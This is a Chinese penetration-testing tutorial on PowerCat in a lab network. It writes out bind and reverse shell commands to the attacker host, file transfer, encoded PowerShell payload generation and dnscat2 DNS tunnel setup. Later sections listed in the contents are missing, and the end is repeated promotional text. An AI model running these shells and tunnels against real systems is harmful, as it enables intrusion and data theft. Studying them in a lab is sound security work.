【渗透测试笔记】之【内网渗透——传输层隧道（PowerCat的使用：正反向shell、文件传输

文章目录

• 1 实验环境
• 2 下载与部署
• • 2.1 下载
    • 2.2 导入
• 3 使用方法
• • 3.1 nc 正向连接PowerCat
    • • 3.1.1 边界服务器
        • 3.1.2 攻击机
    • 3.2 PowerCat 反向连接nc
    • • 3.2.1 攻击机
        • 3.2.2 边界服务器
    • 3.3 文件传输
    • • 3.3.1 接收方
        • 3.3.2 发送方
        • • 边界服务器
    • 3.4 生成PowerShell payload
    • • 3.4.1 正向shell
        • 3.4.2 反弹shell
    • 3.5 PowerCat DNS 隧道通信
    • • 3.5.1 下载与部署
        • 3.5.2 使用方法
        • • 攻击机
            • 受害机
    • 3.6 内网转发
    • • 3.6.1 nc作为服务端（TCP协议）
        • 3.6.2 dnscat作为服务端（dns协议）

1 实验环境

kali（攻击机，外网地址：192.168.8.48）
Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）
CentOS7（边界服务器，外网地址：192.168.8.35，内网地址：10.1.1.13）
DC（内网地址：10.1.1.2）

2 下载与部署

2.1 下载

下载地址：https://github.com/besimorhino/powercat

2.2 导入

Import-Module .\powercat.ps1

可能会出现ps权限不足的情况：

修改ps权限后再导入（需要管理员权限）：

Set-ExecutionPolicy Unrestricted
y
Import-Module .\powercat.ps1

3 使用方法

3.1 nc 正向连接PowerCat

3.1.1 边界服务器

Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）

powercat -l -p 4444 -e cmd.exe -v
# 监听4444端口
powercat -l -p 4444 -ep -v
# 回连powershell

3.1.2 攻击机

kali（攻击机，外网地址：192.168.8.48）

nc 192.168.8.57 4444 -vv

3.2 PowerCat 反向连接nc

3.2.1 攻击机

kali（攻击机，外网地址：192.168.8.48）

nc -l -p 4444 -vv
# 监听4444端口

3.2.2 边界服务器

Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）

powercat -c 192.168.8.48 -p 4444 -v -e cmd.exe
# 返回cmd
powercat -c 192.168.8.48 -p 4444 -v -ep
# 返回powershell

返回cmd：

kali上成功接收：

返回powershell：

3.3 文件传输

3.3.1 接收方

DC（内网地址：10.1.1.2）

powercat -l -p 4444 -of C:\Windows\Temp\1.txt -v
# -of：文件储存位置及名称

3.3.2 发送方

边界服务器

Windows2012（边界服务器，外网地址：192.168.8.57，内网地址：10.1.1.10）

powercat -c 10.1.1.2 -p 4444 -i C:\Windows\Temp\1.txt -v
# -i：文件发送路径及名称

可在里面追加内容，如果不需要追加，Ctrl+C传输结束。

3.4 生成PowerShell payload

连接方式同上，正向nc连接powercat，反向powercat反弹到nc。只是将受害机的执行方式变为了ps脚本。
主要用到的参数：

-g：生成powershell payload
-ge：生成经过编码的payload
# 经过编码的payload利用方式：powershell -E 编码后的payload

3.4.1 正向shell

1. 生成payload：

powercat -l -p 4444 -e cmd.exe -v -g >> shell.ps1
# -p指定监听端口

2. 在受害机执行payload：
   
3. kali正向连接：

nc 192.168.8.57 4444 -vv

3.4.2 反弹shell

1. kali开启监听

nc -l -p 4444 -vv

2. 生成反弹shell payload：

powercat -c 192.168.8.48 -p 4444 -v -e cmd.exe -g >> shell.ps1

3. 执行payload：

3.5 PowerCat DNS 隧道通信

powercat的dns通信服务端是基于dnscat设计的，所以需要先安装服务端。

3.5.1 下载与部署

dnscat下载地址：https://github.com/iagox86/dnscat2/tags

kali（攻击机，外网地址：192.168.8.48）

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

3.5.2 使用方法

攻击机

kali（攻击机，外网地址：192.168.8.48）

ruby dnscat2.rb ttpowercat.test -e open --no-cache

最后

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！

如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！

由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！

-1715569190003)]

[外链图片转存中…(img-wGeOMNKu-1715569190003)]

[外链图片转存中…(img-h60g609G-1715569190003)]

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！

如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！

由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！